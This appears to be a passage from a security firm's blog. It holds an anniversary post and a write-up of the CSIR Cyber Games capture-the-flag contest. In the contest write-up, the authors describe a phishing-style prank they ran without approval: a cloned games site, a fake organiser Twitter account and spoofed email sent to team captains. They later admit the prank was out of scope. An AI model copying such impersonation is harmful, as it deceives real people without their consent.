While peer to peer storage systems have lower setup and maintenance costs, they face security threats from storage nodes that are not under the direct physical or remote control of the cloud controller. Examples of such threats relate to the cloud's client agent software and the cloud server's authorisation controls, as demonstrated in this post. While analysis of the data encryption and redundancy in the peer to peer storage system would be an interesting future research topic, we hope that the findings from this research can be used to improve the security of various distributed storage systems.

Thu, 14 Feb 2013

Adolescence: 13 years of SensePost

Today marks our 13th birthday. In Internet years, that's a long time. Depending on your outlook, we're either almost a pensioner or have just started our troublesome teens. We'd like to think it's somewhere in the middle. The Internet has changed a lot since SensePost was first started on the 14th of February 2000. Our first year saw the infamous ILOVEYOU worm wreak havoc across the net, and we learned some lessons on vulnerability disclosure; a year later we moved on to papers about "SQL insertion" and advanced trojans. And the research continues today.


We've published a few tools along the way, presented some (we think) cool ideas and were lucky enough to have spent the past decade training thousands of people in the art of hacking. Most importantly, we've made some great friends in this community of ours. It has been a cool adventure, and very much still is, for everyone who's had the pleasure of calling themselves a Plakker. Ex-Plakkers have gone on to do more great things and branch out into new spaces. Current Plakkers are still doing cool things too!


But reminiscing isn't complete without some pictures to remind you just how much hair some people had, and just how little some people's work habits have changed. Not to mention the now questionable fashion.



Fast forward thirteen years: the offices are fancier and the Plakkers have become easier on the eye, but the hacking is still as sweet.



As we move into our teenage years (or statesmanship, depending on your view), we aren't standing still or slowing down. The team has grown; we now have ten different nationalities on the team, are capable of holding a conversation in over 15 languages, and have developed incredible foosball skills.


This week we marked another special occasion for us at SensePost: the opening of our first London office, in the trendy Hackney area (it has "hack" in it, and is down the road from Google - fancy, eh?). We've been operating in the UK for some time, but decided to put down some roots with our growing clan on this side of the pond.



And we still love our clients; they made us who we are, and still do. Last month alone the team was in eight different countries doing what they do best.


But with all the change we are still the same SensePost at heart. Thank you for reminiscing with us on our birthday. Here's to another thirteen years of hacking stuff, having fun and making friends.

Tue, 11 Dec 2012

CSIR Cyber Games

The Council for Scientific and Industrial Research (CSIR) recently hosted the national Cyber Games Challenge as part of Cyber Security Awareness month. The challenge pitted teams of 4-5 members from different institutions against each other in a Capture the Flag style contest. In total there were seven teams: two from Rhodes University, two from the University of Pretoria and three from the CSIR.


The games were designed around an attack/defence scenario, where teams would be given identical infrastructure which they could then patch against vulnerabilities while identifying possible attack vectors to use against rival teams. After the initial reconnaissance phase, teams were expected to conduct a basic forensic investigation to find 'flags' hidden throughout their systems. These 'flags' were hidden in images, pcap files, alternate data streams and in plain sight.


It was planned that teams would then be given access to a few web servers to attack and deface, gain root on, patch and do other fun things to. Once this phase was complete the system would be opened up and the 'free-for-all' phase would see teams attacking each other's systems, losing points for each service rendered inaccessible. Unfortunately, due to technical difficulties the competition did not go as smoothly as planned. Once the games started, the main website was rendered unusable almost immediately because teams were running DirBuster against the competition scoring system. The offending teams were asked to cease their actions and the games proceeded from there; two teams were later disqualified for not ceasing their attacks on official infrastructure. When teams tried to access their virtual infrastructure, new problems arose, with only the two teams from Rhodes able to access the ESX server while the teams based at the CSIR had no connectivity. This was rectified, at a cost, resulting in all teams except the two Rhodes teams having access to their infrastructure. After a few hours of struggle it was decided to scrap the attack/defence part of the challenge. Teams were awarded points for finding hidden flags, with the most basic flags involving 'decoding' a morse-code pattern or a phrase 'encrypted' using a quadratic equation. It was unfortunate that the virtual infrastructure did not work as planned, as this was to be the main focus of the games, and sadly without it many teams were left with very little to do in the time between new 'flag' challenges being released.


In the days prior to the challenge our team, team Blitzkrieg, decided to conduct a social engineering exercise. We expected this to add to the spirit of the games and to introduce a little friendly rivalry between the teams before the games commenced. A quick Google search for "CSIR Cyber Games" revealed a misconfigured cyber games server that had been left exposed on a public interface. Scraping this page for information allowed us to create a fake Cyber Games site. A fake Twitter account was created on behalf of the CSIR Cyber Games organisers and used to tweet little titbits of disinformation. Once we had set up our fake site and Twitter account, a spoofed email in the name of the games organiser was sent out to all the team captains. Teams were invited to follow our fake user on Twitter and to register on our cyber games page. Unfortunately this exercise did not go down too well with the games organisers, and our team was threatened with disqualification or starting the games on negative points. In hindsight we should have run this by the organisers first to ensure that it was within scope. After the incident we engaged with the organisers to explain our position and intentions; they were very understanding and decided not to disqualify us or apply any point-based penalty. As part of our apology, we agreed to submit a few challenges for next year's Cyber Games.


Overall, we believe the concept of using structured cyber games to promote security awareness is both fun and useful. While the games were hampered by network issues, there was enough content available to make for an entertaining and exciting afternoon. The rush of solving challenges as fast as possible and everyone sharing ideas made for an epic day. In closing, the CSIR Cyber Games was a success; as with all things, we believe it will improve over time and provide a good platform to promote security awareness.


For the defacement phase of the games we made an old school defacement page.